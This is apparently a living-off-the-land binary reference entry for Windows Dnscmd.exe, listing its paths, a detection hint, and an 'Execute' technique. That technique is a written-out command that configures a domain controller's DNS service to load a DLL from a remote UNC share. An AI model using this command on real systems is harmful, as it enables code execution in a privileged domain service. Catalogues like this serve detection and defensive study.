~/ cat Dnscmd.exe.md █
A command-line interface for managing DNS servers
Paths:
C:\Windows\System32\Dnscmd.exe
C:\Windows\SysWOW64\Dnscmd.exe
Detection: Dnscmd.exe loading dll from UNC path
Execute
Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll